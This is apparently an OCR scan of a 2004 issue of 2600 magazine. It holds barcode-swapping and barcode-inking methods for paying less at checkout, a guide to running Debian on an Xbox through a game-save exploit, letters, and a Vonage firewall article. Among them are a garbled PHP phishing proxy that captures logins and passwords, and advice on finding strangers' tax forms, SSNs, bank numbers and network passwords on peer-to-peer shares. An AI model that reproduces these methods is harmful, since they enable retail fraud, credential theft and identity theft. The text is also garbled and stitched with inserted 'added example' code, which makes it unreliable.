The Sticker: I didn't purchase any software for this and couldn't find any freeware that would get the size how I wanted it. I didn't look very hard though. I did it in Paint, making each small line and space one pixel wide and having the whole bar code about 86 pixels vertically. The whole barcode should be about 98 pixels wide. I selected the area from 0,0 to 102,88 coordinates and copied (not arbitrarily). I pasted this into Word and stretched it horizontally by two of their units. After printing, it looks exactly like a barcode, size and everything. It also leaves enough room for the correct numbers to show through, so if I get caught, there's a backup plan.

The advantage of this is that you don't need the extra Gatorade to buy a Power-Aid at the Gatorade price. Just print the barcode on a sticker and slap it on the Power-Aid. Another advantage is that now you can go to a normal checkout. Depending on the cashier, they probably won't notice the sticker and if you strike some conversation with them, they won't notice a different product on their monitor.
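
The field layout and checksum rule described above, as an added example (not part of the original article; the function names are this example's own): a Python parser that splits a UPC-A into its fields and validates the check digit, run on the three codes the article quotes. It shows what the check digit does and does not protect: every single-digit misread is rejected, but a different intact label is just another valid code, so a register can only catch a swapped label by comparing the product it looked up with the item in hand.

```python
"""UPC-A field parser and check-digit validator (added example)."""
from dataclasses import dataclass

# Meaning of the first digit as listed in the article; other values are "reserved".
NUMBER_SYSTEMS = {
    "0": "normal UPC", "6": "normal UPC", "7": "normal UPC",
    "2": "weighted item",
    "3": "National Drug and Health related",
    "4": "store-specific",
    "5": "coupon",
}


@dataclass(frozen=True)
class Upc:
    number_system: str  # digit 1
    manufacturer: str   # digits 2-6
    product: str        # digits 7-11
    check: int          # digit 12
    kind: str           # meaning of digit 1


def _digits(text: str, length: int) -> str:
    """Strip the spaces used in printed codes and insist on ASCII digits."""
    digits = "".join(text.split())
    if len(digits) != length or not (digits.isascii() and digits.isdigit()):
        raise ValueError(f"expected {length} digits, got {text!r}")
    return digits


def check_digit(first11: str) -> int:
    """Check digit for the first 11 digits, following the article's rule."""
    d = [int(c) for c in _digits(first11, 11)]
    odd = sum(d[0::2])    # 1st, 3rd, 5th, 7th, 9th, 11th
    even = sum(d[1::2])   # 2nd, 4th, 6th, 8th, 10th
    return (10 - (odd * 3 + even) % 10) % 10


def parse_upc(text: str) -> Upc:
    """Split a 12-digit UPC-A into fields; raise ValueError on a bad check digit."""
    digits = _digits(text, 12)
    expected = check_digit(digits[:11])
    if expected != int(digits[11]):
        raise ValueError(f"check digit {digits[11]} should be {expected}")
    return Upc(digits[0], digits[1:6], digits[6:11], expected,
               NUMBER_SYSTEMS.get(digits[0], "reserved"))


def is_valid(text: str) -> bool:
    """True when the text is 12 digits with a correct check digit."""
    try:
        parse_upc(text)
    except ValueError:
        return False
    return True


def single_digit_errors_detected(text: str) -> int:
    """Count how many of the 12 * 9 single-digit substitutions fail validation."""
    digits = _digits(text, 12)
    detected = 0
    for i, original in enumerate(digits):
        for replacement in "0123456789":
            if replacement == original:
                continue
            altered = digits[:i] + replacement + digits[i + 1:]
            detected += not is_valid(altered)
    return detected


if __name__ == "__main__":
    # The three codes quoted in the article.
    for code in ("0 43000 10370 8", "0 43000 10540 5", "5 21000 23030 8"):
        print(code, parse_upc(code))
    # Every one-digit misread is caught by the weights 3 and 1 ...
    print(single_digit_errors_detected("0 43000 10370 8"), "of 108 misreads rejected")
    # ... but the check digit says nothing about which product the label is on,
    # so the register must compare the looked-up product with the actual item.
    print(is_valid("0 43000 10540 5"))
```
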
You may want to purchase a couple of legitimate things to throw them off though. This method also looks less suspicious than the self-checkout switch. One downside is that you could still get caught if the sticker is identified or if a different product is noticed by a cashier (or supervisor of self-checkout).

Inking: This is my favorite method, and by far the least useful. What you do is take a non-glossy pen and widen some lines to change the code. This is hard to do, since the changed line should actually be a number, the changed numbers should actually be a product, and the product should hopefully be cheaper. I made myself a chart of the convertible numbers on the left and right side, respectively.

[Chart: convertible numbers on the left and right sides]

A practical example would be converting those two Post products I demonstrated earlier. Grape Nuts was 0 43000 10370 8 and Waffle Crisps was 0 43000 10540 5. To change Grape Nuts to Waffle Crisps, you convert the three to a five, the seven to a four, and the eight to a five (notice they're all on the right side since the manufacturer part would be the same).

Although this is a limited method, as long as it's not done in front of a camera you probably will not get caught. You would also get Uber-Hardcore points for doing it this way. I've only done this once successfully and have definitely gotten it wrong a couple times.

Shouts: Prof. Tomasi, Evin, and 2600 Phoenix.

Installing Debian on your Unmodded Xbox

You have your Xbox, you're bored of the games that you have, you fancy a challenge. Why not install GNU/Linux on it?

Everyone has heard things on the web about the efforts to make various distributions run on the Xbox and of course there are many horror stories of people making their Xboxs into nice door stops. However, installing Linux is surprisingly easy provided you know what you are doing. Back in 19:4 Live_wire showed us how to install Ed's Debian on a modded Xbox.
Since then there have been many advances in what you can do with your Xbox and many more distros have appeared, including Gentoox (a Gentoo clone), Slothbox (a Slackware clone), plus a release of Mandrake and SuSE. Ed's is the most mature and one of the better maintained. All the distros and information on them, along with more detailed technical documents are available from the xbox-linux website over at http://xbox-linux.sf.net. The SourceForge project page (http://www.sourceforge.net/projects/xbox-linux) hosts all the files needed in this little howto.

A word of warning: Some things can and will go wrong. The author doesn't take any responsibility if Bad Things happen when installing Linux on your Xbox. If in doubt, don't try it.

Before you start you should have the following things at hand, otherwise you will end up having to go to the store halfway through the operation. An approximate equipment list follows (some parts are optional):

An unmodified Xbox.
A USB keyboard.
A USB memory device (i.e., a memory stick or USB zip drive).
A USB mouse (optional).
A USB hub (optional).
The game 007: Agent Under Fire for Xbox.
A computer running Linux (kernel 2.4.20 or 2.4.21 with source and development tools).
A network (in some form).
A relatively high speed Internet connection.
Patience.

Presuming that you have already read Live_wire's article you should have a working USB adapter. If not, go away and make one then come back.

Once you have a USB adapter made, plug in a USB memory stick. The Xbox will detect it in the Dashboard and it will show up under memory. The Xbox will want to format it, so make sure you don't have anything important saved to it that you want to keep.

All programs running on the Xbox have to be digitally signed by Microsoft. This means that it is very hard to run code that you are not supposed to. However, workarounds have been found. There are bugs in certain games which allow non-signed code to be executed.
On a very basic level, this is done by crashing the Xbox whilst loading a game, then getting it to load Linux instead. This can be done in both MechAssault and 007: Agent Under Fire. What follows is how to do it with 007: Agent Under Fire.

There are quite a few ways to get the 007 hack onto the Xbox. The one I will describe uses a Linux workstation. This method does not require you to open the Xbox up but does require you spend a little money on a USB memory stick. You can pick these things up for around 20 pounds in most computer stores (probably cheaper online). Make sure that the stick is supported by the Linux usb-storage.o driver.

For this you will need a Linux PC with all the standard development tools (gcc, make, and everything else you need to build the kernel). You will also need the source to the 2.4.21 kernel. I presume at this point that you know what you are doing and have compiled the kernel before (if not, go and compile a few to practice then come back).

Okay, now we need to patch the kernel with support for the FATX file system. This is what the Xbox uses to format its hard drive and also its memory cards. I will show two ways of patching the kernel and it depends on how lazy you are as to which you pick.

The first way is to use CVS. You need to get some of the current pre-patched sources from the xbox-linux cvs site such as the 2.4.21 kernel source. This requires that you have cvs installed. Assuming you have it installed, create a directory (say "/usr/src/tmp") and execute this command in there:

    cvs -z3 -d:pserver:anonymous@cvs.sourceforge.net:/cvsroot/xbox-linux co kernel

This might take a while but eventually you'll have downloaded the needed kernel source files to the directory. An "ls" will show you have one directory named "kernel." This folder contains the Xbox specific files for the kernel.
All you need to do now is copy the (Xbox specific) files across to the actual kernel source tree, replacing as you go. Assuming that the source was unzipped to "/usr/src/linux" and the cvs files are in "/usr/src/tmp" we execute this command:

    cp -rf /usr/src/tmp/kernel/* /usr/src/linux/kernel/

Once you've done this, change directory to the real kernel source (e.g. "/usr/src/linux") and do a "make config", "make menuconfig", or "make xconfig" as usual. Now you can carry on configuring the kernel.

If you don't like cvs, prefer kernel 2.4.20, or if you find a patch file easier to use, you might be better off using an older patch that is still available from the project page but not recommended. At the time of writing the file was called "kernel-2_4_20-0_7_0.patch.gz." This is just a normal kernel patch file. Once you have untar/gzipped your 2.4.20 kernel source file (I assume to "/usr/src/linux" from now on), copy the patch file to a level above (e.g. "/usr/src"), then change directory to the source. Once you're there, execute the following command:

    zcat ../kernel-2_4_20-0_7_0.patch.gz | patch -p1

This will apply the patch to the kernel. You should have a list of files scroll up the screen that have been changed by the patch. Now that your kernel is patched, it's time to configure it.

The first option you need to add is support for the USB memory card (if you already had this, then ignore this section). The USB storage driver is really just some glue code between the USB and SCSI subsystems. So, first things first - add SCSI support. It's your choice if you want to do these as loadable modules or as built-ins. The SCSI options you want are SCSI Support and SCSI Disk Support. Exit the SCSI menu and go into the USB Support. In there you'll need Support for USB, Preliminary USB Device File System, USB Mass Storage Support, and one of the USB Host Controller Devices. The last is up to you to choose.
If in doubt select all of them as modules and see which one loads.

Now to add the support for FATX. This is done in the File Systems menu. The only options that you need to enable are FATX (Xbox) fs support, then within Partition Types select Advanced Partition Selection and then Xbox Support. Now you can exit, saving your changes. Compile the kernel as you would normally. Remember to re-run lilo (or whatever bootloader you use) and then reboot with your new kernel.

Now we have a brand new kernel and all the tools that we need to copy the save game file to the memory card. First - to download the files we want. On the xbox-linux SourceForge project page there is a file called 007distro.tar.gz. This file contains everything you need to get Debian onto your Xbox (beware: this file is quite large, over 200 megs). Unzipping the file will leave you with two folders. One is named memcard, the other is called harddisk. You can ignore the latter for the moment as we don't need it until further on in the process. In the memcard folder there is an .ini file and also a directory called UDATA. What we are interested in are the contents of the UDATA folder. In there is a directory called 4541000d. This is an Xbox game save. In it is the game that will crash the Xbox and load Linux. Now you need to copy just this folder to your memory stick.

Mount the drive as usual and copy the directory over. To check that the copy has gone okay you can load up the Dashboard on your Xbox and in the Memory menu you should be able to see your card and also see that there is a game save on the device. All that is left for this part now is to copy the save game to the hard drive of your Xbox. This may take a couple of seconds as the files are relatively large. In my experience, sometimes the Xbox will say that the game files are corrupted or will try to format the device. All you have to do is try again.
Remember that the FATX driver is still in its early days and things can (and probably will) still go wrong.

The actual installation is relatively easy. Plug in your keyboard, but leave your controller in too as you'll need it to control things at first. Now load 007: Agent Under Fire. Wait until you get to the main menu screen. Select Load Game, then Xbox Hard Drive. This might take a while but eventually you'll get a kind of chime noise and xromwell (the boot loader) will display some information for you. At this point it'll tell you the size of your Xbox hard drive. This will be essential for later but it's very fast so try to spot it and remember it.

After xromwell has done its thing there follows the normal kernel boot process, modules will load, and BusyBox will start up. You might need to hit enter a couple of times to get things to start up. Once you do there will be the normal login prompt. You can login as root with the password xbox.

Now you need to get the installation files onto the Xbox. Probably the easiest way to do it is to put it on another computer running an http or ftp daemon, then use wget to fetch the file from there. The file you want to be serving is the contents of the harddisk directory from the 007distro.tar.gz file. You can tar and gzip it to aid transport over the network as BusyBox has those tools at your disposal. Alternatively, you could use Samba to transfer the file by just mounting the appropriate share on your Samba server.

Before you start the transfer you might want to check the network settings. By default the IP address is set to 192.168.0.64/24 with a default gateway at 192.168.0.1. You can use the usual tools to set them differently or if you're using DHCP, dhclient is available.

You want all of these files in /media/E, which is the part of the Xbox hard drive used for game saves.
The partition is about five gigabytes big so unless you've been saving lots of games and/or audio there should be plenty of space for the file.

Now we must replace the linuxboot.cfg file with a version that points to the files we have just copied over, so we execute:

    cp /media/E/linuxboot.cfg /media/E/UDATA/4541000d/000000000000

If you are running low on space you can delete the tar.gz file which we downloaded.

Now we can reboot and pull off the 007 trick again to boot into Linux once more. Now when you boot there should be X-Windows running. Hopefully this will boot and give you a login. You can plug in your USB mouse now if you like, although you can use the Xbox controller to make the cursor move. Once you login as root (with password xbox) you will see Window Maker start up, get a terminal, and execute:

    /sbin/XBOXLinuxInstaller

This will start up a little graphical tool asking you some questions. These are straightforward, network setting etc., although there is one that can cause some trouble. That is the choice between installing to the E partition (where the game save files are) or to the spare unpartitioned space on the end of the hard disk. This is where you have to remember the information that xromwell told you earlier. The original Xbox had 8.4 gigabyte drives whereas the newer models have 10 gigabyte drives. Now if you have an old model, you can't install Linux in the unpartitioned space. You have to install to a loopback file in the E partition. On the other hand, if you are lucky and have a newer device then the choice is up to you.

Assuming you made your decision, you can wait and let the installer get all of the files copied over and then reboot.

It is possible that the install might not have worked, in which case you can repeat the final part again. This happened to me a number of times but practice makes perfect. If there were no errors then you have succeeded in installing Linux on your Xbox.
Congratulate yourself by apt-get update-ing and downloading some new free software.

Shouts: Wilz, Woody, Druga, and miki_.

Spring 2004 Page 31

Assorted Questions

Dear 2600:
Can you tell me when article submissions close for the next edition? I have an idea for an article I'd like to submit, but haven't put pen to paper yet. Just want to know my time frame.
Jason

While we try to keep a strict deadline for ourselves, oftentimes articles are selected for a future issue rather than the current one. In other words, it doesn't really matter if you miss one of our deadlines. Just send us what you have. Plus, we're always missing our deadlines anyway.

Dear 2600:
I have been reading through hours and hours of Bush commentary and I think, in fact at this point I am sure, that Bush is wearing an earpiece whenever he is talking to the press. Please tell me you can intercept or know anyone that can intercept this signal.
Andrew

If this is true, you would have to be pretty close to the signal in order to intercept it. That in itself would be a far bigger challenge. But assuming you somehow managed to intercept and possibly alter whatever message was being sent, the result would probably be a lot of confusion and commentaries that didn't make much sense. Do you honestly think anyone would notice the difference?

Dear 2600:
I realize that most of you don't agree with projects like TIA or Big Brother, but at the same time you want all information public. How do these two coexist? Would you agree with Big Brother if anyone could access the information it collected? Keep up the great work.
tchnprgrmr

Actually we know of very few people who want all information to be public. We believe information, particularly that of a private nature, needs to be protected. Often this isn't the case and one of the best ways of determining this is for systems to be constantly tested for security holes.
This leads to the messenger frequently being blamed for the message. Hackers who uncover unprotected private information are treated as if they created the weak security when all they did was figure out a way to defeat it. The media portrays them as the threat to your privacy when in actuality hackers do much more to protect it. We consider their actions to be responsible, especially when they reveal their findings to the world.

Meanwhile, all kinds of corporate and governmental entities seek to invade our privacy on a constant basis for reasons ranging from surveillance to marketing. While it would solve nothing to give everyone access to the information these entities collect, it's extremely important to understand exactly what they're doing and how, as well as ways to protect oneself from such intrusions. This is something else they don't want you to know.

Dear 2600:
Could you help me? What date can be considered birthday of 2600? Thank you in advance.
Alexey
NfP "Informzasehita", Russia

2004 is our 20th anniversary so we consider everyday

\n"? print "You just gave me your login and password for the following Web print "

\n"; print "

    \n"; foreach ($ POST as $k -> $v) { print “«li»$k: $v $v) ( print ”Sk: Sv\n"; print "Have a nice day ! \n" ; print "\n" ,• exit ; # if one of our links was not submitted, print the list of links if (1 isset <$p)) print "\n" ; print “Useful Links\n"j $i-0 ; foreach ($dest as $c) St . Slink [$i! . *t#l%00«* . S_SERVER [' SERVER NAME' ] . SPHPSELP . *?p-’ print "$dest [$i] < Ai>\n" ; $i++; ) print "
\n " ; print "\n" ; else ( # here we go ... some eager sucker has followed one of our links # first, parse the URL in case we need to supply a base href later Surl . parse_url ($p) ; $base_href = $url [scheme] . *://” . $url [host] . •/"; # go grab the page Shandle ■ fopen ($p, "r”); Scontenta - * " ; do { Schunk = fread( Shandle, 8192) ; if (strlen (Schunk) «« 0) { break ,• D . • . U I 4 a l n n H . . site: \n ” i . Slink CSili Scontents .= $chunk ; ) while (true); f close (Shandle) ; # stick it all in $data Sdata = explode (”\n" , Scontents); # go through $data line by line for ( $ i = 0 ; Si if (isset ($in_forra) && $in_form) { # we're in the form if (stristr (Sdata t$i] , "type") && stristr ($data l$i) , “password")) ( # we've found the password blank $found_password = 1 j if (stristr (Sdata [$i) , "< input type-\ "hidden\ " name-\"the_ •»site_you_really_wanted\" value*\"$p\"»" ; # dump the compromised page to the client's browser foreach (Sdata as Sline) print "Sline"; print "\n"; if (stristr (Sline, "chead") && I isset (Sfound base href)) print "\n" ;

Continued from page 39

user name attached to the oracle lock alongside SQLPLUSW.EXE and he flipped out. Two hours after I left work, I tried to login to the web-based e-mail application and I saw my account was disabled. Two hours later, my account was deleted. I got no voicemail messages, so I came in to work that night as usual. When I walked through the door, the security guard told me I was not allowed to be inside the building and offered no explanation why.

The next morning I heard the lowdown from my manager and he said the programmers thought of me as a security risk and they wanted me out of there immediately. They changed all the passwords for almost every server and application around, and terminated me right then and there.
I wanted to tell you this story because I feel it's important to communicate this sort of security paranoia that is plaguing America and perhaps the rest of the world today. I never hurt a soul inside that place. I fought Nimda and all sorts of other viruses with the best of them. I reported security problems and was kind to end-users over all the building, no matter how much knowledge they had. All I wanted to do was learn and experience computing in an environment where there were resources available to see things I would not be able to afford to buy on my own. They are very insecure and because they knew that I wasn't just a droid who stayed up all night and escalated technical problems, I became a threat in their mind. So the real problem in corporate America is still just plain old ignorance. Thanks for a great magazine. I have faith.
John Anon

Dear 2600:
I've been going to school for the past 12 years and I'm currently a junior at York Community High School (www.elmhurst.k12.il.us/schools/york/york.html) in Elmhurst, Illinois - a moderately priced suburb almost 15 miles due west of Chicago, IL. During my time in the public school system, it's come to my attention that there have been serious impediments of the free pursuit of information within the public school system. The school administration and teachers have been involved with blocking information that is informative, simply to avoid the risk of students learning information that is bad.

At our school, there's a piece of software installed called "WebSense" on a certain server on our network. All website queries are passed through this server, and URLs containing certain key terms such as "phrack" are blocked from access. Computers in the library are constantly monitored for any activity that may be interpreted as unacceptable.
The school library is restricted to schoolwork only and we're limited from learning anything extra (I once got in trouble for learning programming during a busy period in the library).

In the information age, we should sometimes ask ourselves, "If our country's defense involves knowledge that may do good or evil, then why shouldn't our personal defense involve this knowledge as well?" The answer seems to me to be simple - our country wants unrestricted rights over their citizens.
thesuavel

Knowledge is power and this certainly shows how much it's feared, even in an environment that supposedly fosters it. But one thing this isn't is unusual.

Dear 2600:
A friend of mine pointed to my 2600 Magazine and said, "You know you can get arrested for having that." It's a sad day in America.
sunami

It's only sad if you listen to the doomsayers. Be happy and fight.

Dear 2600:
During the recent snowstorms, one of the local news channels used a website to allow people to post business closings. A group of people affiliated with my university decided it would be fun to submit fake (often vulgar) business closings. Anyway, when this was in the newspaper the next week I overheard students in one of my courses talking about how the site had been hacked. Using a public form on a website hardly seems like "hacking" to me.
ieMpleH

Dear 2600:
The other day I was about to go out wardriving with my laptop when I picked up a network before leaving my driveway. Problem was, it was encrypted. Damn, I thought. But I was bored so I decided to mess around. I put 00000000 as the network key and pressed OK. Much to my surprise, it worked! I had connected to my neighbor's "encrypted" network. Shows that there really is no patch for human stupidity.
mord

Tips

Dear 2600:
In 20:3, you responded to a letter saying that someone got Final Cut Pro for $50. I just wanted to note that companies like Apple and Microsoft give out educational discounts. For the latest version of Final Cut Pro,
you can get it at 500 dollars at the educational discount. How do you get this educational discount legally? Easy, go to a community college, register for the cheapest class, buy the software, and then drop the class you registered. If the class is refundable, great! You just saved a lot of money by buying a piece of software legally that would have cost you much more if you were an average customer.
College_Student

This doesn't address the original point of someone being forced to go the pirate route because of the lack of any guarantee that the software would actually work under a certain configuration. It's an example of the lack of support directly affecting sales.

Meeting Trouble

Dear 2600:
I went to the Buffalo meeting this month that's supposed to be at the Food Court over at the Galleria Mall (which is actually in Cheektowaga). Nobody was there for any 2600 meeting. I've asked around and this has been going on for almost a year now. What do you (and we) do when something like this happens?

I'd just like to point out that Galleria Mall is way off in the burbs and almost totally inaccessible by public transportation. It's pretty much only accessible by car. I'm trying to organize people to go but it's hard without the transportation support. Could it possibly be moved to something really easily accessible? Boulevard Mall is much closer to Buffalo and the surrounding areas and very easily accessible by public transportation. Not only that but it's only five minutes from the local college campus - University at Buffalo North Campus. Tell me what I need to do to get this set in motion.
Kaosaur

The best way to achieve this is to first determine that the meetings aren't going on as advertised. Since yours is one of many such letters we've received on this particular location and since we haven't gotten an update from this meeting in a while, we've delisted it. This means you're free to pursue starting up the meeting at a new site.
We suggest conferring with others on this as the last thing you want is a divided group that can't decide where to meet. When you have a consensus, be sure to send us updates (to meetings <

Import With Quicktime and select your downloaded song.
4. Save as a WAV or comparable file type.
5. Import the WAV into iTunes.
6. Select the WAV in iTunes and choose Advanced > Convert Selection to AAC/MP3/whatever file type you have chosen as the default codec.

This is reminiscent of the old days of MP3 encoding that involved a manual two step process using different programs to rip and then encode. While tools that reduce this process to one click will undoubtedly evolve and become more common, this method is useful because of its simplicity and interesting because of its irony.

Vonage Broadband Phone Service
by Kevin T. Blakley

As a 15 year security professional and Vonage phone service user over the past six months, I have uncovered some serious security problems with its use and solutions to possible security risks for both business and home users. This broadband phone service which saves the end user hundreds or even thousands of dollars a year on local toll and long distance charges can pose certain vulnerabilities to your network. The service, which uses Cisco's VOIP ATA-186 telephone adapter, opens several holes in network security.

Vonage offers little help with serious technical or security issues and in fact several technical representatives stated to me that I should simply allow all traffic on the following ports (UDP: 53 (domain), 69 (tftp), 123 (sip), 5060, 5061, and 10000 - 20000) into my secured local network for any source IP. There are many exploits for all of these ports which include exploits for tftp on port 69, computer management on port 10000, and others. Vonage refuses to provide their source IP's for the VOIP connections.
Given this information one could easily set up firewall rules which would allow traffic only from Vonage's VOIP server addresses to the voice unit. Service redirection, which is known to most seasoned firewall users, allows the firewall to map user defined ports to a predefined local or private IP address. This, while not suggested by Vonage, would suffice in securing the local private network and also provide security to the ATA unit. What was suggested by Vonage was the placement of the ATA-186 into a DMZ firewall zone. While this offers some logging ability for attempted attacks, it opens up the ATA unit itself to possible attacks via the open service ports mentioned above, specifically tftp, and a service that is normally turned off: http (port 80).

Since broadband Internet service is today almost as common as a television and with broadband phone service providers such as Vonage gaining popularity, it is the responsibility of security professionals such as myself to provide information to the general public relating to security threats. Personal firewalls such as the one provided in Windows XP and the many variants on the market protect the computer on which they are installed from various attacks. However they do not protect any other device which is on the same network connected through a broadband router. Many of the most popular broadband router/firewalls on the market today do offer some packet filtering but most do not inspect UDP traffic which is what the ATA-186 voice unit uses to communicate VOIP traffic.

For those home or business users who do not employ a firewall on the front end of their network, I would suggest doing so and employing stateful packet inspection of all traffic relating to the use of any VOIP device. Such small office and home products are available from many manufacturers such as Check Point, Watchguard, Netgear, and Linksys. In no way am I discounting the value of broadband phone service providers.
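The four ways of exposing the ATA discussed in this article (DMZ placement, the listed ports opened to any source, the same ports forwarded only from the provider's addresses, and stateful inspection) can be compared on one packet trace. This is an added example, not part of the original article; the trace, the 203.0.113.0/24 provider range and the 30-second state timeout are constructed assumptions.

```python
import ipaddress
from dataclasses import dataclass

# UDP ports the article says Vonage support wanted opened to any source IP.
VOIP_PORTS = {53, 69, 123, 5060, 5061} | set(range(10000, 20001))
# Placeholder range (documentation block); the real ranges were not disclosed.
PROVIDER_NET = ipaddress.ip_network("203.0.113.0/24")
FLOW_TIMEOUT = 30  # assumed lifetime, in seconds, of an entry in the state table


@dataclass(frozen=True)
class Packet:
    t: int            # seconds since the start of the trace
    direction: str    # "out": ATA -> Internet, "in": Internet -> ATA
    proto: str        # "udp" or "tcp"
    remote_ip: str
    remote_port: int
    local_port: int   # port on the ATA


def flow_key(pkt):
    return (pkt.proto, pkt.remote_ip, pkt.remote_port, pkt.local_port)


def dmz(pkt, flows):
    """ATA placed in a DMZ: every inbound packet reaches it, http included."""
    return True


def any_source(pkt, flows):
    """Listed UDP ports opened for every source address."""
    return pkt.proto == "udp" and pkt.local_port in VOIP_PORTS


def provider_only(pkt, flows):
    """Listed UDP ports forwarded to the ATA only from the provider's range."""
    return (any_source(pkt, flows)
            and ipaddress.ip_address(pkt.remote_ip) in PROVIDER_NET)


def stateful(pkt, flows):
    """Inbound traffic admitted only as a reply to a recent outbound flow."""
    last_seen = flows.get(flow_key(pkt))
    return last_seen is not None and pkt.t - last_seen <= FLOW_TIMEOUT


POLICIES = {"dmz": dmz, "any_source": any_source,
            "provider_only": provider_only, "stateful": stateful}

# Constructed trace: (time, direction, proto, remote ip, remote port, ATA port).
TRACE = [Packet(*row) for row in [
    (0, "out", "udp", "203.0.113.10", 5060, 5060),     # ATA contacts the provider
    (1, "in", "udp", "203.0.113.10", 5060, 5060),      # reply to that request
    (5, "in", "udp", "198.51.100.7", 40000, 69),       # unsolicited tftp
    (6, "in", "udp", "198.51.100.7", 40001, 10000),    # unsolicited, port 10000
    (7, "in", "tcp", "198.51.100.7", 40002, 80),       # probe of the http service
    (10, "out", "udp", "203.0.113.20", 12000, 10002),  # ATA starts a voice stream
    (11, "in", "udp", "203.0.113.20", 12000, 10002),   # voice stream reply
    (12, "in", "udp", "203.0.113.99", 5060, 5061),     # provider-range source but
                                                       # no flow (UDP can be forged)
    (60, "in", "udp", "203.0.113.10", 5060, 5060),     # late packet, state expired
]]


def admitted(policy, trace):
    """Replay the trace and return the inbound packets the policy lets through."""
    flows, passed = {}, []
    for pkt in trace:
        if pkt.direction == "out":
            flows[flow_key(pkt)] = pkt.t        # the ATA opened or refreshed a flow
        elif policy(pkt, flows):
            if flow_key(pkt) in flows:
                flows[flow_key(pkt)] = pkt.t    # accepted replies keep it alive
            passed.append(pkt)
    return passed


def compare(trace=TRACE):
    """Map each policy name to the (remote ip, ATA port) pairs it admits."""
    return {name: [(p.remote_ip, p.local_port) for p in admitted(fn, trace)]
            for name, fn in POLICIES.items()}


if __name__ == "__main__":
    for name, hits in compare().items():
        print(f"{name:14} admits {len(hits)} inbound packets: {hits}")
```

The last trace entry shows the cost of the strictest policy: once the state entry expires, even the provider's own packets are dropped until the ATA sends again.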
However, it is my opinion that these same providers should be a little more security conscious.

by Kong #include

Even if you will not admit it, more than likely you have downloaded some sort of music or software via a peer to peer network like millions of other people around the world. Whether it was in the glory days of Morpheus and Napster or in the RIAA infested world of Kazaa today, it makes no difference. While you can find almost any sort of media you desire, there are more interesting things that can be found. First, let's examine what happens when you install most online sharing programs. The setup program will ask you what files and folders you want to share. Since naive and novice computer users know that sharing is the basis of all peer to peer networks, they decide to share everything in their "My Documents" folder or sometimes even everything on their computer without knowing that there is anything wrong with this. Now it gets interesting if you know what to look for.

Several times I have found network configuration documents that people left laying around on their computer. Many of these documents are for different businesses and schools that have hired people to install networks for them. These documents often contain idiot-proof instructions on how to connect to the network (not like that is a complicated process). Besides the instructions which you can toss aside, such documents can also contain every computer's hostname, IP address, usernames, passwords, and various other proprietary information meant for employees only. All it takes is one careless employee to leave the document on an unsecured computer and the whole world has access to it. Some good keywords to search for are network, setup, configuration, install, and LAN.

Despite it being scary how easily someone can obtain such detailed information about a network, the following is even scarier. The popular craze today is doing taxes online.
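Seen from the sharing user's side, the same keywords can be used to audit a folder before a peer-to-peer client exposes it. This is an added example, not code from the article; it also checks for the tax-form details the article goes on to describe, and the sample files, the content patterns and the routing-number checksum test are choices made here.

```python
import os
import re
import tempfile

# File-name keywords taken from the article (network documents and tax forms).
NAME_KEYWORDS = {"network", "setup", "configuration", "install", "lan",
                 "return", "tax", "1040", "8283", "federal"}

# Content patterns chosen for this example.
CONTENT_RULES = {
    "password": re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[:=]\s*\S+"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}
NINE_DIGITS = re.compile(r"\b\d{9}\b")


def is_aba_routing(num):
    """True if a 9-digit string passes the ABA routing-number checksum."""
    d = [int(c) for c in num]
    total = 3 * (d[0] + d[3] + d[6]) + 7 * (d[1] + d[4] + d[7]) + (d[2] + d[5] + d[8])
    return num != "000000000" and total % 10 == 0


def audit_share(root, max_bytes=65536):
    """Return {relative path: sorted reasons} for files that should not be shared."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            reasons = set()
            # Match whole tokens so that "plan" does not trigger the "lan" keyword.
            tokens = set(re.split(r"[^a-z0-9]+", fname.lower()))
            reasons.update("name:" + k for k in NAME_KEYWORDS & tokens)
            try:
                with open(full, "rb") as fh:
                    text = fh.read(max_bytes).decode("utf-8", errors="ignore")
            except OSError:
                reasons.add("unreadable")
                text = ""
            for label, rx in CONTENT_RULES.items():
                if rx.search(text):
                    reasons.add("content:" + label)
            if any(is_aba_routing(m) for m in NINE_DIGITS.findall(text)):
                reasons.add("content:routing-number")
            if reasons:
                findings[rel] = sorted(reasons)
    return findings


def build_sample_share(root):
    """Write a small constructed folder tree; every value in it is made up."""
    samples = {
        "Music/song.mp3": b"ID3\x03\x00\x00\x00\x00",
        "My Documents/vacation plan.txt": b"pack sunscreen\n",
        "My Documents/school LAN setup.txt":
            b"host: lab-pc-01 192.168.1.20\nusername: admin\npassword: hunter2\n",
        "My Documents/2003 federal return 1040.txt":
            b"SSN: 000-12-3456\nRouting number: 123456780\n"
            b"Account number: 0001112223\n",
    }
    for rel, data in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as share:
        build_sample_share(share)
        for path, reasons in sorted(audit_share(share).items()):
            print(path, "->", ", ".join(reasons))
```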
At most places you enter all your information and within a few days or even hours they send you your tax information in PDF form. The two forms sent are the 1040 and 8283. The 8283 is basically a worksheet that isn't needed but contains your address, social security number, work, work phone number, and money earned that year. All this can be used for pretty much any purpose you desire. The 1040 contains even more vital information. It has the same information as the 8283 plus some. This is the form you have to send in to the IRS. If you are receiving a refund, more than likely you are getting a direct deposit to speed things up. In order to receive this, the form will require you to fill out your bank's routing number and account number. Several sites have a search engine that allows you to enter a routing number and tells you the bank's name.

After obtaining any of those documents, you have a good deal of information about a person. Just search for items such as return, tax, 1040, 8283, federal, or anything of that nature. It might take awhile to download something interesting and most files will not be what you are looking for but eventually you will find something worthwhile. Just remember not to be too vicious with anything you discover.

THE FIFTH HOPE
3 Days of Hacker Fun at the HOtel PEnnsylvania in New York City
Friday, July 9th through Sunday, July 11th
Keynote Speaker: Kevin Mitnick
Plus Three Tracks of Speakers, Movies, Games
Admission for the Entire Conference is $50
Register at www.hope.net or Write to: The Fifth Hope c/o 2600, P.O. Box 752, Middle Island, NY 11953 USA

MSN Redirect Scan
by StankDawg@hotmail.com

If you visit msn.com (which you might do as the default home page in a lot of circumstances) you may notice that the page can be customized based on your settings.
